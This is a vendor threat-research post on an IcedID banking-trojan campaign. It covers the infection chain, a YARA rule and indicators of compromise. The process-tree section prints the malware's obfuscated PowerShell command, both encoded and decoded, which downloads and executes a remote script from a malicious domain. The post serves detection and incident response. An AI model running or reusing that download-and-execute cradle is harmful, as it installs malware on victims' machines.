IcedID, also known as BokDot, is a banking trojan that was first discovered in 2017. It targets a victim’s financial information and it is also capable of dropping other malware, most commonly CobaltStrike.
OpenText™ Cybersecurity Services observed a recent malspam campaign where IcedID was delivered via an archived zip file containing a Visual Basic script.
The OpenText Services Team, as part of its threat research activities, continuously monitor how malware behaves on the endpoint and creates alerting content for the OpenText Managed Extended Detection and Response (MxDR) Service and its Managed Security Services customers.
Infection Chain
Upon execution of a malicious JavaScript associated with the IcedID infection, it calls the command interpreter to execute a base64 encoded Windows PowerShell. The PowerShell then communicates outbound to an IcedID redirect domain, followed by a download of a malicious DLL file. Next, the PowerShell executes the downloaded DLL using the Rundll process. And finally, the DLL is launches a Command and Control (C2) client that generates traffic with IcedID C2 server.
Parent Process: C:\Windows\explorer.exe
Child Process: C:\Windows\System32\wscript.exe
CommandLine: C:\Windows\System32\WScript.exe:C:\Users\Administrator\Downloads\scan_contract.js
Parent Process: C:\Windows\System32\wscript.exe
Child Process: C:\Windows\System32\cmd.exe
CommandLine: “C:\Windows\System32\cmd.exe” /c poWershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA
Decoded Base64 Script:
IEX (New-Object Net.Webclient).downloadstring(“https://shisyatnic[.]top/gatef1.php”)
Parent Process: C:\Windows\System32\cmd.exe
Child Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: poWershell -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBoAGkAcwB5AGEAdABuAGkAYwAuAHQAbwBwAC8AZwBhAHQAZQBmADEALgBwAGgAcAAiACkA
execution on Unsigned or Untrusted DLL’s
Yara Rule for IcedID identification:
rule IcedID_Malware {
meta:
author = “OpenText”
description = “Detects IcedID”
strings:
$s1 = “POST” fullword wide
$s2 = “; _ga=” fullword wide
$s3 = “; _u=” fullword wide
$s4 = “; __io=” fullword wide
$s5 = “; _gid=” fullword wide
$s6 = “Cookie: _s=” fullword wide
condition:
all of ($s*)
}
Indicators of Compromise:
IcedID Redirect Domain: shisyatnic[.]top/gatef1.php
IcedID DLL Hosting Domain: shisyatnic[.]top/dll/loader_p1_dll_64_n1_x64_inf.dll77.dll
IcedID C2: skanfordiporka[.]com
IcedID JavaScript: MD5 Hash – fb1a30af0da989004eaeeac8e72778df
IcedID DLL: MD5 Hash – 658f14c5d83de5e5fee5f5ae00087139
OpenText Cybersecurity Services
Upon detection of a malware, like IceID, OpenText recommends an Incident Response be carried out. Our Consulting Team uses their extensive experience to threat hunt and remediate any suspected cyber attack. Customers rely on OpenText for their Digital Forensics and Incident Response as well as our Risk & Compliance Advisory and Managed Security Services. Learn more about our Services.
